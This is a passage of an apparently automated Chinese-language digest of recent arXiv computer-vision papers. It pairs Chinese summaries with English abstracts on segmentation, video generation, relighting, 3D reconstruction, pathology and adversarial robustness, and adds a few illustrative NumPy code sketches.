【速读】:该论文旨在解决全球范围内农田边界精准提取的难题,尤其针对现有基于深度学习的遥感影像分割方法在光照变化、空间尺度差异及地理区域迁移时性能不稳定的问题。其关键解决方案在于提出一种融合U-Net主干网络、复合损失函数(composite loss functions)与针对性数据增强策略的新颖分割框架,显著提升了模型在真实世界条件下的性能和鲁棒性,在Fields of The World (FTW) 基准上实现了76%的交并比(IoU)和47%的物体F1分数(object-F1),较基线分别提升6%和9%,为可扩展、可复现的农田边界自动识别提供了实用技术路径。
链接: https://arxiv.org/abs/2603.27101
作者: Gedeon Muhawenayo,Caleb Robinson,Subash Khanal,Zhanpei Fang,Isaac Corley,Alexander Wollam,Tianyi Gao,Leonard Strnad,Ryan Avery,Lyndon Estes,Ana M. Tárano,Nathan Jacobs,Hannah Kerner
机构: Arizona State University (亚利桑那州立大学); Microsoft AI for Good (微软AI for Good); Washington University in St. Louis (圣路易斯华盛顿大学); Oregon State University (俄勒冈州立大学); Wherobots (Wherobots); Clark University (克拉克大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注: 12 pages, 3 figures, supplementary material. Accepted at CVPR 2026 (IEEE/CVF Conference on Computer Vision and Pattern Recognition)
Abstract:Large-scale maps of field boundaries are essential for agricultural monitoring tasks. Existing deep learning approaches for satellite-based field mapping are sensitive to illumination, spatial scale, and changes in geographic location. We conduct the first systematic evaluation of segmentation and geospatial foundation models (GFMs) for global field boundary delineation using the Fields of The World (FTW) benchmark. We evaluate 18 models under unified experimental settings, showing that a U-Net semantic segmentation model outperforms instance-based and GFM alternatives on a suite of performance and deployment metrics. We propose a new segmentation approach that combines a U-Net backbone, composite loss functions, and targeted data augmentations to enhance performance and robustness under real-world conditions. Our model achieves a 76% IoU and 47% object-F1 on FTW, an increase of 6% and 9% over the previous baseline. Our approach provides a practical framework for reliable, scalable, and reproducible field boundary delineation across model design, training, and inference. We release all models and model-derived field boundary datasets for five countries.
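摘要提到的"复合损失函数"未给出具体构成;分割任务中常见的一种组合是 BCE 加 Dice,下面给出这种常见组合的 NumPy 示意,仅作为理解"composite loss"含义的参照,论文实际采用的损失组合可能不同:

```python
import numpy as np

def composite_loss(pred, target, eps=1e-7):
    """常见的 BCE + Dice 复合分割损失(示意性替代,非论文原配方)。

    pred: (H, W) 前景概率,取值 (0, 1);target: (H, W) 二值掩码。
    """
    p = np.clip(pred, eps, 1 - eps)
    bce = -np.mean(target * np.log(p) + (1 - target) * np.log(1 - p))
    inter = np.sum(p * target)
    dice = 1.0 - (2 * inter + eps) / (np.sum(p) + np.sum(target) + eps)
    return bce + dice
```

BCE 逐像素约束概率,Dice 直接优化区域重叠,对农田边界这类细长前景通常比单用 BCE 更稳。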
[CV-226] EFlow: Fast Few-Step Video Generator Training from Scratch via Efficient Solution Flow
【速读】:该论文旨在解决视频扩散变换器(Video Diffusion Transformers)在训练和推理过程中面临的两大瓶颈问题:一是每步注意力计算的二次复杂度导致的高计算成本,二是迭代采样步骤带来的延迟。解决方案的关键在于提出EFlow框架,其核心创新包括:(1)设计了门控局部-全局注意力机制(Gated Local-Global Attention),通过可丢弃令牌的混合模块显著降低每步计算量并保持稳定性;(2)提出路径丢弃引导训练(Path-Drop Guided Training)与均速度可加性正则化(Mean-Velocity Additivity Regularizer),以高效替代昂贵的指导目标并保障极低步数下的生成质量。该方案实现了从零开始训练的高效流水线,在Kinetics及大规模文本到视频数据集上达到竞争性性能,同时训练吞吐量提升最高达2.5倍,推理延迟降低45.3倍。
链接: https://arxiv.org/abs/2603.27086
作者: Dogyun Park,Yanyu Li,Sergey Tulyakov,Anil Kag
机构: Snap Inc.(Snap公司)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Scaling video diffusion transformers is fundamentally bottlenecked by two compounding costs: the expensive quadratic complexity of attention per step, and the iterative sampling steps. In this work, we propose EFlow, an efficient few-step training framework, that tackles these bottlenecks simultaneously. To reduce sampling steps, we build on a solution-flow objective that learns a function mapping a noised state at time t to time s. Making this formulation computationally feasible and high-quality at video scale, however, demands two complementary innovations. First, we propose Gated Local-Global Attention, a token-droppable hybrid block which is efficient, expressive, and remains highly stable under aggressive random token-dropping, substantially reducing per-step compute. Second, we develop an efficient few-step training recipe. We propose Path-Drop Guided training to replace the expensive guidance target with a computationally cheap, weak path. Furthermore, we augment this with a Mean-Velocity Additivity regularizer to ensure high fidelity at extremely low step counts. Together, our EFlow enables a practical from-scratch training pipeline, achieving up to 2.5x higher training throughput over standard solution-flow, and 45.3x lower inference latency than standard iterative models with competitive performance on Kinetics and large-scale text-to-video datasets.
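EFlow 的均速度可加性正则化基于一个简单恒等式:若 v(x,t,s) 是从 t 到 s 的均速度,则位移应满足 (s−t)·v(t,s) = (m−t)·v(t,m) + (s−m)·v(m,s)(m 为中间时刻)。下面的 NumPy 草图计算该恒等式的残差,作为正则化项的示意(符号与论文记法未必一致):

```python
import numpy as np

def mean_velocity_additivity(v, x, t, m, s):
    """均速度可加性残差。

    v(x, t, s): 模型预测的从时刻 t 到 s 的均速度(可调用对象)。
    对真实的均速度场,任意中间时刻 m 都应使残差为 0。
    """
    lhs = (s - t) * v(x, t, s)
    rhs = (m - t) * v(x, t, m) + (s - m) * v(x, m, s)
    return np.mean((lhs - rhs) ** 2)
```

与时间无关的常值速度场天然满足该恒等式,而不自洽的预测会产生非零残差,这正是该正则化项惩罚的对象。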
[CV-227] SceneExpander: Expanding 3D Scenes with Free-Form Inserted Views
【速读】:该论文旨在解决3D场景扩展中的多视图一致性问题,即在用户主导的工作流中,如何将由生成式模型合成的新增视角无缝插入已有的3D重建场景,同时避免因几何错位、幻觉内容或视图依赖性伪影导致的全局一致性破坏。解决方案的关键在于提出SceneExpander框架,其通过测试时适配(test-time adaptation)对参数化前馈3D重建模型进行优化,并引入两种互补的知识蒸馏信号:锚点蒸馏(anchor distillation)利用真实捕获视图的几何线索稳定原始场景结构,插入视图自蒸馏(inserted-view self-distillation)则在保留观测支持预测的基础上,自适应调整潜在几何与外观以兼容错位的插入视图,从而实现高质量且一致的3D场景扩展。
链接: https://arxiv.org/abs/2603.27084
作者: Zijian He,enjie Liu,Yihao Wang,Weizhi Zhong,Huan Yuan,Kun Gai,Guangrun Wang,Guanbin Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:World building with 3D scene representations is increasingly important for content creation, simulation, and interactive experiences, yet real workflows are inherently iterative: creators must repeatedly extend an existing scene under user control. Motivated by this research gap, we study 3D scene expansion in a user-centric workflow: starting from a real scene captured by multi-view images, we extend its coverage by inserting an additional view synthesized by a generative model. Unlike simple object editing or style transfer in a fixed scene, the inserted view is often 3D-misaligned with the original reconstruction, introducing geometry shifts, hallucinated content, or view-dependent artifacts that break global multi-view consistency. To address the challenge, we propose SceneExpander, which applies test-time adaptation to a parametric feed-forward 3D reconstruction model with two complementary distillation signals: anchor distillation stabilizes the original scene by distilling geometric cues from the captured views, while inserted-view self-distillation preserves observation-supported predictions yet adapts latent geometry and appearance to accommodate the misaligned inserted view. Experiments on ETH scenes and online data demonstrate improved expansion behavior and reconstruction quality under misalignment.
[CV-228] LightCtrl: Training-free Controllable Video Relighting ICLR2026
【速读】:该论文旨在解决现有视频重光照(video relighting)方法在光照控制方面缺乏显式调控能力的问题。当前基于扩散模型的方法虽能实现高质量图像和视频的重光照,但难以精确引导光照变化以匹配用户指定的光轨迹。解决方案的关键在于提出LightCtrl,其核心创新包括:一是引入光照图注入模块(Light Map Injection module),通过采样与光轨迹相关的噪声并注入到源视频的潜在表示中,提升输出视频与条件光轨迹之间的光照一致性;二是设计几何感知重光照模块(Geometry-Aware Relighting module),在频域动态融合RGB与法线图的潜在特征,有效抑制原始光照影响,从而增强对输入光轨迹的遵循能力。该方法无需训练即可实现可控视频重光照,在保持时序一致性的同时显著提升了光照控制精度。
链接: https://arxiv.org/abs/2603.27083
作者: Yizuo Peng,Xuelin Chen,Kai Zhang,Xiaodong Cun
机构: Tsinghua University (清华大学); GVC Lab, Great Bay University (大湾大学GVC实验室); Adobe Research (Adobe研究院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at ICLR 2026
Abstract:Recent diffusion models have achieved remarkable success in image relighting, and this success has quickly been extended to video relighting. However, existing methods offer limited explicit control over illumination in the relighted output. We present LightCtrl, the first controllable video relighting method that enables explicit control of video illumination through a user-supplied light trajectory in a training-free manner. Our approach combines pre-trained diffusion models: an image relighting model processes each frame individually, followed by a video diffusion prior to enhance temporal consistency. To achieve explicit control over dynamically varying lighting, we introduce two key components. First, a Light Map Injection module samples light trajectory-specific noise and injects it into the latent representation of the source video, improving illumination coherence with the conditional light trajectory. Second, a Geometry-Aware Relighting module dynamically combines RGB and normal map latents in the frequency domain to suppress the influence of the original lighting, further enhancing adherence to the input light trajectory. Experiments show that LightCtrl produces high-quality videos with diverse illumination changes that closely follow the specified light trajectory, demonstrating improved controllability over baseline methods. Code is available at: this https URL.
[CV-229] Structural Graph Probing of Vision-Language Models CVPR
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Models, VLMs)中神经元群体计算组织方式不明确的问题,特别是如何从神经拓扑结构的角度理解跨模态信息处理的内在机制。其解决方案的关键在于将每一层表示为基于神经元共激活关系的层内相关性图(within-layer correlation graph),从而揭示神经拓扑结构是否具有行为意义、如何随深度和模态变化,以及能否识别出在干预下具有因果影响力的内部组件。研究发现,相关性拓扑不仅携带可恢复的行为信号,且跨模态结构随深度逐渐收敛至一组重复出现的枢纽神经元(hub neurons),对这些神经元的靶向扰动显著改变模型输出,表明神经拓扑是连接局部解释与整体行为的有意义中间尺度,兼具可解释性与可操作性。
链接: https://arxiv.org/abs/2603.27070
作者: Haoyu He,Yue Zhuo,Yu Zheng,Qi R. Wang
机构: Northeastern University (东北大学); Massachusetts Institute of Technology (麻省理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) 2026
Abstract:Vision-language models (VLMs) achieve strong multimodal performance, yet how computation is organized across populations of neurons remains poorly understood. In this work, we study VLMs through the lens of neural topology, representing each layer as a within-layer correlation graph derived from neuron-neuron co-activations. This view allows us to ask whether population-level structure is behaviorally meaningful, how it changes across modalities and depth, and whether it identifies causally influential internal components under intervention. We show that correlation topology carries recoverable behavioral signal; moreover, cross-modal structure progressively consolidates with depth around a compact set of recurrent hub neurons, whose targeted perturbation substantially alters model output. Neural topology thus emerges as a meaningful intermediate scale for VLM interpretability: richer than local attribution, more tractable than full circuit recovery, and empirically tied to multimodal behavior. Code is publicly available at this https URL.
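作为示意,下面给出构建"层内相关性图"并挑选枢纽神经元的最小玩具例子(假设已获得某一层在若干输入上的神经元激活矩阵;此处用随机数代替真实激活,神经元数 32、阈值 0.1 均为假设参数,并非论文原始设置):

```python
import numpy as np

rng = np.random.default_rng(0)
# 假设:某一层 32 个神经元在 500 个输入上的激活(随机数仅作演示)
acts = rng.normal(size=(500, 32))

# 层内相关性图:节点为神经元,边权为神经元两两共激活的相关系数绝对值
corr = np.abs(np.corrcoef(acts, rowvar=False))
adj = (corr > 0.1) & ~np.eye(32, dtype=bool)  # 阈值化得到无自环的邻接矩阵

# 以度数最高的节点近似"枢纽神经元"(hub neurons)
degree = adj.sum(axis=1)
hubs = np.argsort(degree)[::-1][:3]
print(degree.shape, hubs)
```

真实方法中激活来自 VLM 的前向推理,且论文还对枢纽神经元做了靶向扰动以验证因果影响,此处仅演示图的构建。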
[CV-230] VIRST: Video-Instructed Reasoning Assistant for SpatioTemporal Segmentation CVPR2026
【速读】:该论文旨在解决现有基于固定关键帧的视频目标分割方法在处理动态变化剧烈或需要多步推理的任务时性能显著下降的问题,尤其是在运动密集型和推理导向型视频场景中表现不佳。其核心解决方案是提出一个端到端框架VIRST(Video-Instructed Reasoning Assistant for Spatio-Temporal Segmentation),通过时空融合(Spatio-Temporal Fusion, STF)机制将分割感知的视频特征融入视觉-语言主干网络,实现全局视频推理与像素级掩码预测的统一;同时引入时间动态锚点更新器(Temporal Dynamic Anchor Updater),维持相邻时间帧作为稳定的时间线索,以应对大范围运动、遮挡及目标重出现等挑战。这一设计在多种真实且具有挑战性的RVOS基准上实现了最先进的性能,展现出对指代和推理导向任务的强大泛化能力。
链接: https://arxiv.org/abs/2603.27060
作者: Jihwan Hong,Jaeyoung Do
机构: Seoul National University (首尔国立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:Referring Video Object Segmentation (RVOS) aims to segment target objects in videos based on natural language descriptions. However, fixed keyframe-based approaches that couple a vision language model with a separate propagation module often fail to capture rapidly changing spatiotemporal dynamics and to handle queries requiring multi-step reasoning, leading to sharp performance drops on motion-intensive and reasoning-oriented videos beyond static RVOS benchmarks. To address these limitations, we propose VIRST (Video-Instructed Reasoning Assistant for Spatio-Temporal Segmentation), an end-to-end framework that unifies global video reasoning and pixel-level mask prediction within a single model. VIRST bridges semantic and segmentation representations through the Spatio-Temporal Fusion (STF), which fuses segmentation-aware video features into the vision-language backbone, and employs the Temporal Dynamic Anchor Updater to maintain temporally adjacent anchor frames that provide stable temporal cues under large motion, occlusion, and reappearance. This unified design achieves state-of-the-art results across diverse RVOS benchmarks under realistic and challenging conditions, demonstrating strong generalization to both referring and reasoning oriented settings. The code and checkpoints are available at this https URL.
[CV-231] owards Intrinsic-Aware Monocular 3D Object Detection CVPR2026
【速读】:该论文旨在解决单目3D目标检测(Mono3D)中因相机内参(camera intrinsics)变化导致的性能下降和跨场景泛化能力弱的问题。现有方法对内参敏感,难以在不同相机配置下保持稳定的3D检测性能,因为内参决定了三维场景到图像平面的投影关系。解决方案的关键在于提出一种统一的内在感知框架MonoIA,其核心创新是将内参建模从传统的数值条件控制转变为基于语言-视觉语义表示的感知理解:通过大语言模型(LLM)和视觉-语言模型(VLM)生成编码相机参数视觉与几何含义的内参嵌入(intrinsic embeddings),并借助层级式内参自适应模块(Intrinsic Adaptation Module)将其融入检测网络,使模型能根据具体相机配置动态调整特征表示,从而实现跨内参的一致性3D感知。这一方法显著提升了在KITTI、Waymo和nuScenes等基准上的性能,并在多数据集训练下进一步优化。
链接: https://arxiv.org/abs/2603.27059
作者: Zhihao Zhang,Abhinav Kumar,Xiaoming Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: This paper is accepted by CVPR 2026
Abstract:Monocular 3D object detection (Mono3D) aims to infer object locations and dimensions in 3D space from a single RGB image. Despite recent progress, existing methods remain highly sensitive to camera intrinsics and struggle to generalize across diverse settings, since intrinsics govern how 3D scenes are projected onto the image plane. We propose MonoIA, a unified intrinsic-aware framework that models and adapts to intrinsic variation through a language-grounded representation. The key insight is that intrinsic variation is not a numeric difference but a perceptual transformation that alters apparent scale, perspective, and spatial geometry. To capture this effect, MonoIA employs large language models and vision-language models to generate intrinsic embeddings that encode the visual and geometric implications of camera parameters. These embeddings are hierarchically integrated into the detection network via an Intrinsic Adaptation Module, allowing the model to modulate its feature representations according to camera-specific configurations and maintain consistent 3D detection across intrinsics. This shifts intrinsic modeling from numeric conditioning to semantic representation, enabling robust and unified perception across cameras. Extensive experiments show that MonoIA achieves new state-of-the-art results on standard benchmarks including KITTI, Waymo, and nuScenes (e.g., +1.18% on the KITTI leaderboard), and further improves performance under multi-dataset training (e.g., +4.46% on KITTI Val).
[CV-232] MOOZY: A Patient-First Foundation Model for Computational Pathology
【速读】:该论文旨在解决当前计算病理学中基础模型(foundation model)在跨临床任务迁移能力不足的问题,尤其是现有方法多以单张切片(whole-slide image, WSI)为中心、依赖私有数据与昂贵的配对报告监督,并且未能显式建模同一患者多个切片之间的关联。其解决方案的关键在于提出一种“以患者为中心”的基础模型MOOZY,通过病例级Transformer(case transformer)在预训练阶段显式建模同一患者所有切片间的依赖关系,结合多阶段自监督学习(Stage 1:基于77,134张公共切片特征网格的掩码自蒸馏;Stage 2:利用56个公开数据集中的333项任务进行病例级多任务对齐),实现高效、可复现的患者层面表征学习。该设计显著提升了跨任务泛化性能,在8个保留任务上优于现有模型(如TITAN和PRISM),同时参数量仅为GigaPath的1/14,验证了患者级预训练在构建可扩展、实用的组织病理学基础模型中的有效性。
链接: https://arxiv.org/abs/2603.27048
作者: Yousef Kotp,Vincent Quoc-Huy Trinh,Christopher Pal,Mahdi S. Hosseini
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Computational pathology needs whole-slide image (WSI) foundation models that transfer across diverse clinical tasks, yet current approaches remain largely slide-centric, often depend on private data and expensive paired-report supervision, and do not explicitly model relationships among multiple slides from the same patient. We present MOOZY, a patient-first pathology foundation model in which the patient case, not the individual slide, is the core unit of representation. MOOZY explicitly models dependencies across all slides from the same patient via a case transformer during pretraining, combining multi-stage open self-supervision with scaled low-cost task supervision. In Stage 1, we pretrain a vision-only slide encoder on 77,134 public slide feature grids using masked self-distillation. In Stage 2, we align these representations with clinical semantics using a case transformer and multi-task supervision over 333 tasks from 56 public datasets, including 205 classification and 128 survival tasks across four endpoints. Across eight held-out tasks with five-fold frozen-feature probe evaluation, MOOZY achieves best or tied-best performance on most metrics and improves macro averages over TITAN by +7.37%, +5.50%, and +7.83% and over PRISM by +8.83%, +10.70%, and +9.78% for weighted F1, weighted ROC-AUC, and balanced accuracy, respectively. MOOZY is also parameter efficient with 85.77M parameters, 14x smaller than GigaPath. These results demonstrate that open, reproducible patient-level pretraining yields transferable embeddings, providing a practical path toward scalable patient-first histopathology foundation models.
[CV-233] Unified Number-Free Text-to-Motion Generation Via Flow Matching
【速读】:该论文旨在解决生成式模型在处理可变数量代理(agent)时的泛化能力不足问题,尤其是现有基于自回归机制的方法在有限领域数据下存在效率低下和误差累积的问题。其核心解决方案是提出统一运动流(Unified Motion Flow, UMF),关键在于将无数量约束的运动生成分解为单次通过的运动先验生成阶段与多次迭代的反应生成阶段:其中,金字塔运动流(Pyramid Motion Flow, P-Flow)通过分层分辨率与噪声条件控制降低计算开销;半噪声运动流(Semi-Noise Motion Flow, S-Flow)则学习联合概率路径以自适应完成反应变换与上下文重建,从而缓解误差传播。此外,UMF利用统一潜在空间弥合异构运动数据集间的分布差异,实现高效统一训练。
链接: https://arxiv.org/abs/2603.27040
作者: Guanhe Huang,Oya Celiktutan
机构: King’s College London (伦敦国王学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Generative models excel at motion synthesis for a fixed number of agents but struggle to generalize with variable agents. Based on limited, domain-specific data, existing methods employ autoregressive models to generate motion recursively, which suffer from inefficiency and error accumulation. We propose Unified Motion Flow (UMF), which consists of Pyramid Motion Flow (P-Flow) and Semi-Noise Motion Flow (S-Flow). UMF decomposes the number-free motion generation into a single-pass motion prior generation stage and multi-pass reaction generation stages. Specifically, UMF utilizes a unified latent space to bridge the distribution gap between heterogeneous motion datasets, enabling effective unified training. For motion prior generation, P-Flow operates on hierarchical resolutions conditioned on different noise levels, thereby mitigating computational overheads. For reaction generation, S-Flow learns a joint probabilistic path that adaptively performs reaction transformation and context reconstruction, alleviating error accumulation. Extensive results and user studies demonstrate UMF’s effectiveness as a generalist model for multi-person motion generation from text. Project page: this https URL.
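摘要所依赖的流匹配(flow matching)范式可用一个极简数值例子说明:在线性概率路径 x_t = (1−t)·x0 + t·x1 下,需要回归的目标速度恰为 x1 − x0。以下为通用流匹配的玩具演示(随机向量代替真实运动潜变量,与 UMF 的实际网络和数据无关):

```python
import numpy as np

rng = np.random.default_rng(0)
x0 = rng.normal(size=4)   # 噪声端样本
x1 = rng.normal(size=4)   # 数据端样本(假设数据,仅作演示)

t = 0.3
x_t = (1 - t) * x0 + t * x1      # 线性概率路径上的插值点
target_velocity = x1 - x0        # 流匹配要回归的条件速度

# 用有限差分验证:路径对 t 的导数等于目标速度
eps = 1e-6
x_t_eps = (1 - (t + eps)) * x0 + (t + eps) * x1
finite_diff = (x_t_eps - x_t) / eps
print(np.max(np.abs(finite_diff - target_velocity)))
```

训练时网络以 (x_t, t) 为输入回归该速度场,采样时沿速度场积分即可从噪声端走到数据端。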
[CV-234] RealBirdID: Benchmarking Bird Species Identification in the Era of MLLM s CVPR26
【速读】:该论文旨在解决野外细粒度鸟类物种识别中因单一图像信息不足而导致的识别难题,尤其关注模型在面对不可回答样本时缺乏合理拒答能力的问题。传统多模态系统往往仅评估可回答案例,导致模型倾向于自信猜测而非基于证据的审慎 abstention(拒绝回答)。解决方案的关键在于提出 RealBirdID 基准测试集,该数据集为每个属提供两类样本:一类是标注了明确理由(如“需声学线索”、“图像质量低”或“视角受阻”)的不可回答示例,另一类是清晰可回答的实例;同时强调模型不仅要在可回答样本上表现准确,还需具备根据证据合理拒答的能力,从而推动细粒度识别系统向更可靠、可解释的方向发展。
链接: https://arxiv.org/abs/2603.27033
作者: Logan Lawrence,Mustafa Chasmai,Rangel Daroya,Wuao Liu,Seoyun Jeong,Aaron Sun,Max Hamilton,Fabien Delattre,Oindrila Saha,Subhransu Maji,Grant Van Horn
机构: UMass Amherst (马萨诸塞大学阿默斯特分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to CVPR26. 23 pages, 23 figures, 5 tables
Abstract:Fine-grained bird species identification in the wild is frequently unanswerable from a single image: key cues may be non-visual (e.g. vocalization), or obscured due to occlusion, camera angle, or low resolution. Yet today’s multimodal systems are typically judged on answerable, in-schema cases, encouraging confident guesses rather than principled abstention. We propose the RealBirdID benchmark: given an image of a bird, a system should either answer with a species or abstain with a concrete, evidence-based rationale: “requires vocalization,” “low quality image,” or “view obstructed”. For each genus, the dataset includes a validation split composed of curated unanswerable examples with labeled rationales, paired with a companion set of clearly answerable instances. We find that (1) the species identification on the answerable set is challenging for a variety of open-source and proprietary models (less than 13% accuracy for MLLMs including GPT-5 and Gemini-2.5 Pro), (2) models with greater classification ability are not necessarily more calibrated to abstain from unanswerable examples, and (3) that MLLMs generally fail at providing correct reasons even when they do abstain. RealBirdID establishes a focused target for abstention-aware fine-grained recognition and a recipe for measuring progress.
[CV-235] YOLO Object Detectors for Robotics – a Comparative Study
【速读】:该论文旨在解决YOLO(You Only Look Once)目标检测模型在机器人工作空间内物体检测任务中的适用性问题。其解决方案的关键在于通过实验验证不同版本YOLO模型在自定义数据集和COCO2017数据集上的性能表现,尤其在图像发生畸变条件下测试模型的鲁棒性,从而为机器人视觉任务中选择合适的YOLO版本提供依据。
链接: https://arxiv.org/abs/2603.27029
作者: Patryk Niżeniec,Marcin Iwanowski,Marcin Gahbler
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:YOLO object detectors recently became a key component of vision systems in many domains. The family of available YOLO models consists of multiple versions, each in various variants. The research reported in this paper aims to validate the applicability of members of this family to detect objects located within the robot workspace. In our experiments, we used our custom dataset and the COCO2017 dataset. To test the robustness of investigated detectors, the images of these datasets were subject to distortions. The results of our experiments, including variations of training/testing configurations and models, may support the choice of the appropriate YOLO version for robotic vision tasks.
[CV-236] Generative Shape Reconstruction with Geometry-Guided Langevin Dynamics
【速读】:该论文旨在解决从不完整或噪声观测中重建完整三维形状的难题,这一问题本质上是病态的(ill-posed),需在测量一致性与形状合理性之间取得平衡。现有方法在理想条件下可实现高几何保真度,但在真实场景下面对缺失数据或噪声时表现不佳;而基于生成模型的3D形状合成方法虽能产生高度逼真的结果,却难以与观测数据保持一致。解决方案的关键在于提出GG-Langevin:一种基于扩散模型的几何引导Langevin动力学(Geometry-Guided Langevin dynamics)的概率方法,通过在扩散模型诱导的Langevin轨迹中每一步都保持测量一致性,从而实现既符合观测数据又满足数据驱动先验的生成式重建。实验表明,该方法在几何精度和对缺失数据的鲁棒性方面优于现有表面重建方法。
链接: https://arxiv.org/abs/2603.27016
作者: Linus Härenstam-Nielsen,Dmitrii Pozdeev,Thomas Dagès,Nikita Araslanov,Daniel Cremers
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Reconstructing complete 3D shapes from incomplete or noisy observations is a fundamentally ill-posed problem that requires balancing measurement consistency with shape plausibility. Existing methods for shape reconstruction can achieve strong geometric fidelity in ideal conditions but fail under realistic conditions with incomplete measurements or noise. At the same time, recent generative models for 3D shapes can synthesize highly realistic and detailed shapes but fail to be consistent with observed measurements. In this work, we introduce GG-Langevin: Geometry-Guided Langevin dynamics, a probabilistic approach that unifies these complementary perspectives. By traversing the trajectories of Langevin dynamics induced by a diffusion model, while preserving measurement consistency at every step, we generatively reconstruct shapes that fit both the measurements and the data-informed prior. We demonstrate through extensive experiments that GG-Langevin achieves higher geometric accuracy and greater robustness to missing data than existing methods for surface reconstruction.
[CV-237] GUIDED: Granular Understanding via Identification Detection and Discrimination for Fine-Grained Open-Vocabulary Object Detection NIPS2025
【速读】:该论文针对细粒度开放词汇目标检测(Fine-grained Open-Vocabulary Object Detection, FG-OVD)中存在的语义纠缠问题展开研究,即预训练视觉语言模型(Vision-Language Model, VLM)嵌入空间中主体(subject)与属性(attribute)的语义耦合导致属性过表示、定位错误和嵌入空间中的语义漂移,从而影响检测性能。解决方案的关键在于提出GUIDED框架,通过解耦主体识别与属性感知两个子任务:首先利用语言模型提取粗粒度主体及其描述属性;随后仅用主体嵌入指导目标定位,确保定位稳定性;再引入基于注意力机制的属性嵌入融合模块,选择性地将属性信息注入检测查询以保留判别力;最后采用区域级属性判别模块,结合改进的视觉语言模型与投影头对检测区域进行精细化匹配,实现更准确的细粒度分类。该方法通过模块化设计实现了对不同任务特性的适配,显著提升了FG-OVD性能。
链接: https://arxiv.org/abs/2603.27014
作者: Jiaming Li,Zhijia Liang,Weikai Chen,Lin Ma,Guanbin Li
机构: Sun Yat-sen University (中山大学); Meituan (美团)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: NIPS2025
Abstract:Fine-grained open-vocabulary object detection (FG-OVD) aims to detect novel object categories described by attribute-rich texts. While existing open-vocabulary detectors show promise at the base-category level, they underperform in fine-grained settings due to the semantic entanglement of subjects and attributes in pretrained vision-language model (VLM) embeddings – leading to over-representation of attributes, mislocalization, and semantic drift in embedding space. We propose GUIDED, a decomposition framework specifically designed to address the semantic entanglement between subjects and attributes in fine-grained prompts. By separating object localization and fine-grained recognition into distinct pathways, GUIDED aligns each subtask with the module best suited for its respective role. Specifically, given a fine-grained class name, we first use a language model to extract a coarse-grained subject and its descriptive attributes. Then the detector is guided solely by the subject embedding, ensuring stable localization unaffected by irrelevant or overrepresented attributes. To selectively retain helpful attributes, we introduce an attribute embedding fusion module that incorporates attribute information into detection queries in an attention-based manner. This mitigates over-representation while preserving discriminative power. Finally, a region-level attribute discrimination module compares each detected region against full fine-grained class names using a refined vision-language model with a projection head for improved alignment. Extensive experiments on FG-OVD and 3F-OVD benchmarks show that GUIDED achieves new state-of-the-art results, demonstrating the benefits of disentangled modeling and modular optimization. Our code will be released at this https URL.
[CV-238] A Provable Energy-Guided Test-Time Defense Boosting Adversarial Robustness of Large Vision-Language Models CVPR
【速读】:该论文旨在解决多模态模型和大型视觉语言模型(Large Visual-Language Models, LVLM)在面对对抗扰动时鲁棒性不足的问题,这严重影响了其在真实场景中的可靠性。解决方案的关键在于提出一种轻量级、无需训练的防御方法——能量引导的测试时变换(Energy-Guided Test-Time Transformation, ET3),该方法通过最小化输入的能量来提升分类器对对抗攻击的鲁棒性,其理论基础是在合理假设下证明该变换能够有效维持分类性能。实验证明,ET3在通用分类、CLIP零样本分类以及LVLM在图像描述生成和视觉问答等任务中均显著增强了模型鲁棒性。
链接: https://arxiv.org/abs/2603.26984
作者: Mujtaba Hussain Mirza,Antonio D’Orazio,Odelia Melamed,Iacopo Masi
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted at the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) 2026, Main Conference
Abstract:Despite the rapid progress in multimodal models and Large Visual-Language Models (LVLM), they remain highly susceptible to adversarial perturbations, raising serious concerns about their reliability in real-world use. While adversarial training has become the leading paradigm for building models that are robust to adversarial attacks, Test-Time Transformations (TTT) have emerged as a promising strategy to boost robustness at inference. In light of this, we propose Energy-Guided Test-Time Transformation (ET3), a lightweight, training-free defense that enhances robustness by minimizing the energy of the input. Our method is grounded in a theory that proves our transformation succeeds in classification under reasonable assumptions. We present extensive experiments demonstrating that ET3 provides a strong defense for classifiers, zero-shot classification with CLIP, and also for boosting the robustness of LVLMs in tasks such as Image Captioning and Visual Question Answering. Code is available at this http URL.
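"能量引导的测试时变换"的核心操作可抽象为:在推理前对输入做若干步能量梯度下降。下面用人工构造的能量函数 E(x) = ½‖x‖² 做一维示意(真实方法中能量由模型定义并作用于图像,此处的能量函数与输入均为假设):

```python
import numpy as np

def energy(x):
    # 假设的玩具能量函数 E(x) = 0.5 * ||x||^2
    return 0.5 * np.sum(x ** 2)

def energy_grad(x):
    return x  # E 的解析梯度

# 被扰动的"输入"(玩具向量代替图像)
x = np.array([2.0, -1.0, 0.5])
lr = 0.1
for _ in range(50):
    x = x - lr * energy_grad(x)  # 测试时变换:迭代最小化输入能量

print(energy(x))  # 能量被显著降低
```

论文的贡献在于证明这类变换在合理假设下不破坏分类性能,代码示例只演示"梯度下降降低输入能量"这一机械步骤。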
[CV-239] Beyond Mortality: Advancements in Post-Mortem Iris Recognition through Data Collection and Computer-Aided Forensic Examination
